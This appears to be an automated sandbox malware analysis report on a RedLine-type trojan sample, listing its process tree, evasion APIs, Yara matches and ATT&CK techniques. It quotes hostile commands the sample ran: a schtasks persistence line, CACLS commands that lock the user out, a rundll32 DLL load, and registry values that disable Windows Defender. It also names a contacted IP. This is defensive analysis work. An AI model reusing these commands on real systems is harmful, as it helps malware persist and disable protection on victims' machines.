                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe TID: 4636Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe TID: 1244Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 5288Thread sleep count: 65 > 30
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 5288Thread sleep time: -1950000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 4392Thread sleep time: -50000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 4776Thread sleep count: 51 > 30
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 4776Thread sleep time: -9180000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 4644Thread sleep count: 47 > 30
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 5288Thread sleep time: -30000s >= -30000s
                            Source: C:\Windows\SysWOW64\rundll32.exe TID: 5068Thread sleep count: 193 > 30
                            Source: C:\Windows\SysWOW64\rundll32.exe TID: 5068Thread sleep time: -193000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeLast function: Thread delayed
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeLast function: Thread delayed
                            Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                            Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 180000
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                            Source: C:\Users\user\Desktop\file.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeAPI coverage: 6.0 %
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 30000
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 50000
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 180000
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 30000
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeAPI call chain: ExitProcess graph end node
                            Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E4C000.00000004.00000020.00020000.00000000.sdmp, mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                            Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information queried: ProcessInformation
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00075467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00072390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exeCode function: 1_2_01082390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 6_2_008DFC58 FindFirstFileExW,
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00072F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_0058092B mov eax, dword ptr fs:[00000030h]
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_00580D90 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 6_2_008DA9A1 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 6_2_008DCFB2 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_0040ADB0 GetProcessHeap,HeapFree,
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeMemory allocated: page read and write | page guard
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00076F40 SetUnhandledExceptionFilter,
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00076CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exeCode function: 1_2_01086F40 SetUnhandledExceptionFilter,
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exeCode function: 1_2_01086CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_004123F1 SetUnhandledExceptionFilter,
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_0058D070 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_0058E883 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_005971D1 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: 2_2_00592658 SetUnhandledExceptionFilter,
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 6_2_008D7A74 SetUnhandledExceptionFilter,
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 6_2_008D7208 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 6_2_008D790F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 6_2_008DBB20 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 6_2_008C38C0 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,VirtualFree,
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:R" /E
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:N"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:R" /E
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000718A3 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: GetLocaleInfoA,
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeCode function: GetLocaleInfoA,
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeQueries volume information: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 6_2_008D7AFC cpuid
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00077155 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 6_2_008E3C76 _free,_free,_free,GetTimeZoneInformation,_free,
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeCode function: 4_2_00007FF9A5D4077D GetUserNameA,
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00072BFB GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle,

                            Lowering of HIPS / PFW / Operating System Security Settings

                            barindex
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableIOAVProtection 1Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1Jump to behavior

                            Stealing of Sensitive Information

                            barindex
                            Source: Yara matchFile source: 2.2.aKuf.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.3.aKuf.exe.5b0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.aKuf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.aKuf.exe.580e67.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000002.00000003.311645008.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.337856885.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.337934822.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 6.2.xriv.exe.8c0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.mnolyk.exe.ad0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.0.mnolyk.exe.ad0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 29.2.mnolyk.exe.ad0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.0.mnolyk.exe.ad0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.mnolyk.exe.ad0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0.xriv.exe.8c0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 25.0.mnolyk.exe.ad0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.3.file.exe.4b3b820.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.mnolyk.exe.ad0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.3.file.exe.4b3b820.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.0.mnolyk.exe.ad0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 29.0.mnolyk.exe.ad0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 25.2.mnolyk.exe.ad0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000007.00000000.365076498.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000012.00000002.375060444.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000012.00000000.369836464.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001D.00000002.755532601.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.822951926.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000002.620289864.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000000.619946114.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000019.00000002.494123229.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.299202495.0000000004AE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000006.00000000.363553384.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000019.00000000.493543411.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001D.00000000.748563706.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, type: DROPPED
                            Source: Yara matchFile source: dump.pcap, type: PCAP
                            Source: Yara matchFile source: 00000007.00000002.823055961.0000000000E4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.823055961.0000000000DBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: mnolyk.exe PID: 2328, type: MEMORYSTR
                            Source: Yara matchFile source: 19.2.rundll32.exe.6e7c0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dll, type: DROPPED

                            Remote Access Functionality

                            barindex
                            Source: Yara matchFile source: 2.2.aKuf.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.3.aKuf.exe.5b0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.aKuf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.aKuf.exe.580e67.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000002.00000003.311645008.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.337856885.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.337934822.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                            Valid Accounts3
                            Native API
                            1
                            Windows Service
                            2
                            Bypass User Access Control
                            21
                            Disable or Modify Tools
                            1
                            Input Capture
                            2
                            System Time Discovery
                            Remote Services1
                            Archive Collected Data
                            Exfiltration Over Other Network Medium14
                            Ingress Tool Transfer
                            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                            System Shutdown/Reboot
                            Default Accounts2
                            Command and Scripting Interpreter
                            1
                            Scheduled Task/Job
                            1
                            Access Token Manipulation
                            1
                            Deobfuscate/Decode Files or Information
                            LSASS Memory1
                            Account Discovery
                            Remote Desktop Protocol1
                            Input Capture
                            Exfiltration Over Bluetooth2
                            Encrypted Channel
                            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                            Domain Accounts1
                            Scheduled Task/Job
                            1
                            Registry Run Keys / Startup Folder
                            1
                            Windows Service
                            2
                            Obfuscated Files or Information
                            Security Account Manager2
                            File and Directory Discovery
                            SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
                            Non-Application Layer Protocol
                            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                            Local Accounts1
                            Service Execution
                            1
                            Services File Permissions Weakness
                            111
                            Process Injection
                            2
                            Software Packing
                            NTDS36
                            System Information Discovery
                            Distributed Component Object ModelInput CaptureScheduled Transfer113
                            Application Layer Protocol
                            SIM Card SwapCarrier Billing Fraud
                            Cloud AccountsCronNetwork Logon Script1
                            Scheduled Task/Job
                            1
                            Timestomp
                            LSA Secrets131
                            Security Software Discovery
                            SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                            Replication Through Removable MediaLaunchdRc.common1
                            Registry Run Keys / Startup Folder
                            2
                            Bypass User Access Control
                            Cached Domain Credentials21
                            Virtualization/Sandbox Evasion
                            VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                            External Remote ServicesScheduled TaskStartup Items1
                            Services File Permissions Weakness
                            1
                            Masquerading
                            DCSync2
                            Process Discovery
                            Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job21
                            Virtualization/Sandbox Evasion
                            Proc Filesystem1
                            System Owner/User Discovery
                            Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                            Access Token Manipulation
                            /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                            Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)111
                            Process Injection
                            Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                            Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron1
                            Services File Permissions Weakness
                            Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                            Compromise Software Supply ChainUnix ShellLaunchdLaunchd1
                            Rundll32
                            KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 signatures2 2 Behavior Graph ID: 800795 Sample: file.exe Startdate: 07/02/2023 Architecture: WINDOWS Score: 100 65 Snort IDS alert for network traffic 2->65 67 Malicious sample detected (through community Yara rule) 2->67 69 Antivirus detection for URL or domain 2->69 71 8 other signatures 2->71 9 file.exe 1 4 2->9         started        12 rundll32.exe 2->12         started        14 rundll32.exe 2->14         started        16 4 other processes 2->16 process3 file4 55 C:\Users\user\AppData\Local\Temp\...\xriv.exe, PE32 9->55 dropped 57 C:\Users\user\AppData\Local\Temp\...\bKug.exe, PE32 9->57 dropped 18 bKug.exe 1 4 9->18         started        22 xriv.exe 3 9->22         started        process5 file6 49 C:\Users\user\AppData\Local\Temp\...\nika.exe, PE32 18->49 dropped 51 C:\Users\user\AppData\Local\Temp\...\aKuf.exe, PE32 18->51 dropped 73 Multi AV Scanner detection for dropped file 18->73 75 Machine Learning detection for dropped file 18->75 24 aKuf.exe 9 1 18->24         started        27 nika.exe 1 1 18->27         started        53 C:\Users\user\AppData\Local\...\mnolyk.exe, PE32 22->53 dropped 77 Contains functionality to inject code into remote processes 22->77 29 mnolyk.exe 18 22->29         started        signatures7 process8 dnsIp9 79 Detected unpacking (changes PE section rights) 24->79 81 Detected unpacking (overwrites its own PE header) 24->81 83 Disable Windows Defender notifications (registry) 24->83 85 Disable Windows Defender real time protection (registry) 24->85 63 62.204.41.4, 49697, 49698, 49699 TNNET-ASTNNetOyMainnetworkFI United Kingdom 29->63 59 C:\Users\user\AppData\Roaming\...\clip64.dll, PE32 29->59 dropped 61 C:\Users\user\AppData\Local\...\clip64[1].dll, PE32 29->61 dropped 87 Multi AV Scanner detection for dropped file 29->87 89 Creates an undocumented autostart registry key 29->89 91 Machine Learning detection for dropped file 29->91 93 Uses schtasks.exe or at.exe to add and modify task schedules 29->93 33 cmd.exe 1 29->33         started        35 schtasks.exe 1 29->35         started        37 rundll32.exe 29->37         started        file10 signatures11 process12 process13 39 conhost.exe 33->39         started        41 cmd.exe 1 33->41         started        43 cmd.exe 1 33->43         started        47 4 other processes 33->47 45 conhost.exe 35->45         started       

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand
                            SourceDetectionScannerLabelLink
                            file.exe64%ReversingLabsWin32.Trojan.RedLine
                            file.exe53%VirustotalBrowse
                            file.exe100%Joe Sandbox ML
                            SourceDetectionScannerLabelLink
